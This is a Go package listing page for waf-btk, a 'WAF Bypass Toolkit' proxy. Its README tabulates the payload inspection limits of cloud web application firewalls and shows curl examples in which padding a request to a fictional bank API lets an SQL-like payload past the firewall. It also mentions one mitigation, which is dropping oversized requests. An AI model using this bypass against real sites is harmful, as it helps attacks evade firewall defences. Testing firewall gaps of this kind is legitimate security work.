waf-btk

command module

v0.0.0-...-820a621 Latest Latest Go to latest Published: Oct 9, 2023 License: MIT Imports: 11 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/ghostsecurity/waf-btk

Links

Open Source Insights

README ¶

waf-btk

WAF Bypass Toolkit

What does it do?

It is well documented that certain cloud provider WAF products have a payload size limitation. This project is an HTTP/HTTPS proxy that acts as a wrapper to evade WAF detection by padding request bodies enough to bypass inspection by those rules.

Limits

Provider	Max payload inspected
AWS WAF	8k
Cloudflare	128k
Google Armor	8k
Azure WAF	128k

How to use it

Start the proxy

make run
2023/04/24 17:17:15 [info] start listening to 127.0.0.1:8888
...

Set a custom request header

To pad a request on the fly, set the waf-btk-padding header to the size you want to pad to. The header will be stripped from the request.

The following example assumes you have an application protected by a WAF with a rule that blocks requests containing SELECT * FROM in the payload.

Example (blocked by WAF):

Replay a normal application/json request through the proxy.

$ curl -k -x http://localhost:8888 'https://api.ghostbank.com/api/v3/transfer' \
  -H 'authority: api.ghostbank.com' \
  -H 'accept: application/json' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'content-type: application/json' \
  -H 'cookie: ghostbank=MTY4MTk4NzQ5M...Oj4UoQKVK1U=' \
  -H 'origin: https://ghostbank.com' \
  -H 'referer: https://ghostbank.com/' \
  -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36' \
  --data-raw '{"account_to":102,"account_from":998,"amount":7,"query":"SELECT * FROM schema"}' \
  --compressed

{"error":"WAF block"}

Example (not blocked by WAF):

Specify the waf-btk-padding header (value is padded in multiples of 1K). To bypass the AWS WAF, use a value of 8 or greater. To bypass the Cloudflare WAF, use a value of 128 or greater.

$ curl -k -x http://localhost:8888 'https://api.ghostbank.com/api/v3/transfer' \
  -H 'authority: api.ghostbank.com' \
  -H 'accept: application/json' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'content-type: application/json' \
  -H 'waf-btk-padding: 8' \
  -H 'cookie: ghostbank=MTY4MTk4NzQ5M...Oj4UoQKVK1U=' \
  -H 'origin: https://ghostbank.com' \
  -H 'referer: https://ghostbank.com/' \
  -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36' \
  --data-raw '{"account_to":102,"account_from":998,"amount":7,"query":"SELECT * FROM schema"}' \
  --compressed

{"status":"ok"}

How to prevent bypass

The simple way to prevent request padding bypass attacks is to just block/drop requests that exceed the size limit. However, this is not always possible/practical.

What's next?

Some WAFs (including AWS WAF) also have limitations on the number of headers and cookies they will evaluate. Future updates to WAF-BTK will extend the padding functionality to headers and cookies as well.

Documentation ¶

There is no documentation for this package.

Source Files ¶

View all Source files

main.go

Directories ¶

Path	Synopsis
internal

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL